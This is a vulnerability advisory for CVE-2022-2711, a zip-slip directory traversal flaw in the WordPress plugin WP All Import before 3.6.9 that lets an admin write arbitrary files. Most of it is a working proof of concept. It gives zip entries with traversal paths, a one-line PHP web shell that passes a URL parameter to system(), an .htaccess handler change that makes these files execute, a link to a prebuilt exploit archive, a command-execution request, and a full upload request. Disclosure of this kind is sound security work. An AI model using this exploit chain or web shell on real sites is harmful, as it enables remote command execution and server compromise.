WP All Import < 3.6.9 – Admin+ Directory traversal via file upload | CVE 2022-2711

Description

The plugin is not validating the paths of files contained in uploaded zip archives, allowing highly privileged users, such as admins, to write arbitrary files to any part of the file system accessible by the web server via a path traversal vector.

Proof of Concept

[1] Download 'poc.zip' via 'https://github.com/lucy-official/TIL/raw/main/Security/Test%20Files/Zipslip/poc.zip'

 poc.zip contains 2 files like below
 -> '../../../../../../../../../../var/www/html/exploit.php.txt'
 -> '../../../../../../../../var/www/html/.htaccess'

 [1-1] '../../../../../../../../../../var/www/html/exploit.php.txt' is as follows.
 ----------------------------------
 <?php system($_GET['cmd']); ?>
 ----------------------------------

 [1-2] '../../../../../../../../var/www/html/.htaccess' is as follows.
 ----------------------------------
 <IfModule mod_rewrite.c>
 [same as the existing .htaccess data]
 AddHandler application/x-httpd-php .php .html
 </IfModule>
 ----------------------------------

[2] Upload the 'poc.zip' via the button [Upload a file] on 'http://localhost/wp-admin/admin.php?page=pmxi-admin-import'

[3] Access 'http://localhost/exploit.php.txt?cmd=id' in order to execute arbitrary commands.


[+++] PoC Request Packet Sample
POST /wp-admin/admin.php?page=pmxi-admin-settings&action=upload&_wpnonce=afb6fb6e5c HTTP/1.1
Host: localhost
Content-Length: 1333
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryrhApgY7BhUu88AGu
Accept: */*
Origin: http://localhost
Referer: http://localhost/wp-admin/admin.php?page=pmxi-admin-import
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: [wordpress-admin-cookie]
Connection: close

------WebKitFormBoundaryrhApgY7BhUu88AGu
Content-Disposition: form-data; name="name"

poc.zip
------WebKitFormBoundaryrhApgY7BhUu88AGu
Content-Disposition: form-data; name="chunk"

0
------WebKitFormBoundaryrhApgY7BhUu88AGu
Content-Disposition: form-data; name="chunks"

1
------WebKitFormBoundaryrhApgY7BhUu88AGu
Content-Disposition: form-data; name="async-upload"; filename="poc.zip"
Content-Type: application/zip

[poc.zip payload]
[ - you can download it via 'https://github.com/lucy-official/TIL/raw/main/Security/Test%20Files/Zipslip/poc.zip']
------WebKitFormBoundaryrhApgY7BhUu88AGu--